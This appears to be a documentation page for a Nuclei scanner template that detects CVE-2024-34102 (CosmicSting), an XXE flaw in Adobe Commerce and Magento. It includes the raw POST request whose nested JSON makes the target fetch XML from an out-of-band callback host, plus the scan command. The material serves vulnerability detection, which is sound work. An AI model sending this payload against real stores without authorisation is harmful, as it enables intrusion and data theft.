Adobe Commerce & Magento - CosmicSting
ID: CVE-2024-34102
Severity: critical
Author: DhiyaneshDK
Tags: cve,cve2024,adobe,magento,xxe,kev
Description
Section titled “Description”Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Restriction of XML External Entity Reference (‘XXE’) vulnerability that could result in arbitrary code execution.
YAML Source
Section titled “YAML Source”id: CVE-2024-34102
info: name: Adobe Commerce & Magento - CosmicSting author: DhiyaneshDK severity: critical description: | Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could result in arbitrary code execution. reference: - https://github.com/spacewasp/public_docs/blob/main/CVE-2024-34102.md - https://www.assetnote.io/resources/research/why-nested-deserialization-is-harmful-magento-xxe-cve-2024-34102 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-34102 cwe-id: CWE-611 cpe: cpe:2.3:a:adobe:magento:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 fofa-query: app="Adobe-Magento" product: magento vendor: adobe tags: cve,cve2024,adobe,magento,xxe,kev
http: - raw: - | POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/1.1 Host: {{Hostname}} Content-Type: application/json
{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"http://{{interactsh-url}}/xxe.xml","dataIsURL":true,"options":12345678}}}}}}
matchers: - type: dsl dsl: - 'contains(interactsh_protocol, "dns")' - 'contains(content_type, "application/json")' - 'contains_any(body, "log file", "cartId", "no Route")' - 'contains(body, "message")' condition: and# digest: 4b0a00483046022100e7c1a01d2481b8fa65a139d19d2f5998698bb235b1ad9a6a6776e30faddbf414022100ae42becee4b3f4f15d0c017efa680f79a4b158314bca0f9134d685f7c4aaea70:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-34102.yaml"